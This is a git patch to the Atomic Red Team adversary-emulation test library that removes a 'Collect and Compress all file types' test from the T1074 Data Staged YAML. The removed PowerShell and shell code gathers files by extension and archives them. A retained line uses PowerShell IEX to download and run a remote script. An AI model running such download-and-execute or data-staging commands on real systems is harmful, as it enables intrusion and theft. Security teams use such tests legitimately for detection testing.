From c516e8663eeede7c3d310df08a73fa44e8243370 Mon Sep 17 00:00:00 2001
From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com>
Date: Sun, 2 Sep 2018 07:07:09 -0600
Subject: [PATCH] Fixed T1074 -

---
 atomics/T1074/T1074.yaml | 81 ----------------------------------------
 1 file changed, 81 deletions(-)

diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml
index 6cf634de..14c3dd2a 100644
--- a/atomics/T1074/T1074.yaml
+++ b/atomics/T1074/T1074.yaml
@@ -14,84 +14,3 @@ atomic_tests:
 name: powershell
 command: |
 powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
-
-- name: Collect and Compress all file types
- description: |
- Collect all specified file extensions recursively from a specified file path on the target machine. All located files are copied into a temporary location before being compressed.
-
- # Not sure if atomic-red supports multi-platform executors under a single attack name
- # It would be nice to correlate (- windows: powershell executor && - linux: sh executor)
- supported_platforms:
- - windows
- - linux
-
- input_arguments:
- extension:
- description: Extensions to search for
- type: String
- default: .log
-
- input_arguments:
- path:
- description: Path to recursively search from
- type: Path
- default: /
-
- # Windows Payload
- # Not sure if multi-line commands support powershell functions or if this would be better placed
- # within an 'atomics/T1074/payload/windows-payload.ps1' file and utilize a (New-Object Net.WebClient).DownloadString
- # to pull down the payload. 
(Not sure how to pass input arguments though)
- executor:
- name: powershell
- command: |
- $FolderPath = '{{ path }}'
- $FileExtension = '{{ extension }}'
-
- New-Item -ItemType directory -Path C:\temp\staging
-
- function TestPath()
- {
- $FileExists = Test-Path $FolderPath
- If ($FileExists -eq $True)
- {
- Return $true
- }
- Else
- {
- Return $false
- }
- }
-
- function ZipFiles()
- {
- Add-Type -Assembly System.IO.Compression.FileSystem
- $compressionLevel = [System.IO.Compression.CompressionLevel]::Optimal
- [System.IO.Compression.ZipFile]::CreateFromDirectory("C:\temp\staging",
- "C:\temp\staging.zip", $compressionLevel, $false)
- }
-
- $Result = (TestPath($FolderPath));
-
- If ($Result)
- {
- $Dir = get-childitem $FolderPath -Recurse -ErrorAction Ignore
- $List = $Dir | where {$_.extension -eq $FileExtension}
- $List | Copy-Item -Destination C:\temp\staging\ -ErrorAction Ignore
- }
- else
- {
- "Folder path is incorrect."
- }
-
- ZipFiles
-
- Remove-Item -Recurse -Force C:\temp\staging
-
- # Linux Payload
- executor:
- name: sh
- command: |
- mkdir -p /tmp/staging
- find {{ path }} -name '*{{ extension }}' -exec cp -prv '{}' '/tmp/staging' ';'
- tar -zcvf /tmp/staging.tar.gz /tmp/staging/
- rm -rf /tmp/staging